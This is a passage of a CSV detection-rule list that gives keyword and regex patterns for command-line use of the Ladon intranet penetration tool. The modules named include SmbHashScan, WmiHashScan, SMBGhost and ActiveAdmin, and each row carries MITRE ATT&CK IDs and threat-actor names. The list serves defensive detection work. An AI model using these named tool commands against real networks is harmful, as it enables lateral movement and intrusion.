T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon * OnlinePC*",".{0,1000}Ladon\s.{0,1000}\sOnlinePC.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon * OsScan*",".{0,1000}Ladon\s.{0,1000}\sOsScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon * OxidScan*",".{0,1000}Ladon\s.{0,1000}\sOxidScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *.txt *",".{0,1000}Ladon\s.{0,1000}\.txt\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *DeBase64*",".{0,1000}Ladon\s.{0,1000}DeBase64.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *FtpScan*",".{0,1000}Ladon\s.{0,1000}FtpScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *LdapScan*",".{0,1000}Ladon\s.{0,1000}LdapScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *SMBGhost*",".{0,1000}Ladon\s.{0,1000}SMBGhost.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *SmbHashScan*",".{0,1000}Ladon\s.{0,1000}SmbHashScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *SmbScan*",".{0,1000}Ladon\s.{0,1000}SmbScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *SshScan*",".{0,1000}Ladon\s.{0,1000}SshScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *TomcatScan*",".{0,1000}Ladon\s.{0,1000}TomcatScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *VncScan*",".{0,1000}Ladon\s.{0,1000}VncScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *WebScan*",".{0,1000}Ladon\s.{0,1000}WebScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *WinrmScan*",".{0,1000}Ladon\s.{0,1000}WinrmScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *WmiHashScan*",".{0,1000}Ladon\s.{0,1000}WmiHashScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *WmiScan*",".{0,1000}Ladon\s.{0,1000}WmiScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ActiveAdmin*",".{0,1000}Ladon\sActiveAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ActiveGuest*",".{0,1000}Ladon\sActiveGuest.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon AdiDnsDump *",".{0,1000}Ladon\sAdiDnsDump\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 